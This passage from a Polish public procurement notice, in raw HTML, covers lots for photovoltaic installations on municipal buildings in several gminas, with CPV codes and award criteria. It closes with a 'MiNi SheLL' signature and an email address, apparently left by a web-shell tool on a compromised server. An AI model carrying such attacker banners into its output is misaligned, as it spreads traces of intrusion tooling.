1. Oczyszczalnia ścieków w Gackach Gacki, 28-400 Leszcze
2. Ośrodek Sportu i Rekreacji w Pińczowie ul. Pałęki 26, 28-400 Pińczów
3. Urząd Miejski ul. 3 Maja 10 w Pińczowie 3 Maja 10, 28-400 Pińczów
4. Pływalna Miejska Delfinek w Pińczowie ul. 7 Źródeł 7, 28-400 Pińczów<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Nowy Korczyn<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
1. Związek Nida 2000 w Starym Korczynie	Stary Korczyn, 28-136 Nowy Korczyn
2. Przepompownia ścieków ssąco-tłocząca w Nowym Korczynie, 28-136 Nowy Korczyn
3. Stacja uzdatniania wody w Nowym Korczynie, 28-136 Nowy Korczyn
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi  </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Stopnica<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
1. Budynek pływalni w Stopnicy	Sportowa 4, 28-130 Stopnica
2. Oczyszczalnia ścieków w miejscowości Falęcin Stary gm. Stopnica Falęcin Stary, 28-130 Stopnica
3. Budynek Urzędu Miasta i Gminy w Stopnicy ul. Kościuszki 2, 28-130 Stopnica<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zaprojektowanie i wykonanie ogniw fotowoltaicznych na budynkach użyteczności publicznej na terenie Gminy Sędziszów <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Obiekty objęte zamówieniem: 
1. Fundacja Kreatywnej Przestrzeni i Rozwoju CampoSfera w Klimontowie gm. Sędziszów Klimontów 31, 28-340 Klimontów
2. Ośrodek Sportu i Rekreacji w Sędziszowie ul. Dworcowa 20A, 
28-340 Sędziszów
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71300000-1,
                    42510000-4,
                    31122000-7,
                    09330000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres udzielonej rękojmi </td><td>30</td></tr><tr><td>Czas reakcji serwisu</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com